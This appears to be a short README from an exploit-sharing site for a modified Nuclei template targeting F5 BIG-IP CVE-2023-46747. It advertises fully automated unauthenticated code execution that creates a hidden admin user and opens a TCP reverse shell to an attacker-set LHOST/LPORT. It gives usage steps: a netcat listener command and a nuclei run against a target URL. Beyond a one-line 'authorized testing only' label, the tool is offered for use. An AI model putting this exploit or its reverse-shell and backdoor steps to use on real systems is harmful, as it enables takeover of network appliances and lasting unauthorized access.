Share
## https://sploitus.com/exploit?id=A1E8B9E7-BE18-54B4-83A5-90CF232F48E7
# F5 BIG-IP CVE-2023-46747 - Unauthenticated RCE + Auto Reverse Shell
**Modified & Improved Nuclei Template by Raguraman**
Critical unauthenticated remote code execution in F5 BIG-IP (CVSS 9.8)
Original discovery: Praetorian + ProjectDiscovery
Patch: https://my.f5.com/manage/s/article/K000137353 (Nov 2023)
### Features of this version
- Fully automated (no manual steps)
- Creates a hidden admin user
- Instantly drops TCP reverse shell (just change LHOST/LPORT)
- Clean output with credentials + token
- Works on all vulnerable versions (13.x โ 17.x unpatched)
### Usage (Authorized testing only!)
```bash
# 1. Edit LHOST and LPORT in the YAML
# 2. Start listener
nc -lvnp 4444
# 3. Run with Nuclei
nuclei -t cve-2023-46747-revshell.yaml -u https://target.company.com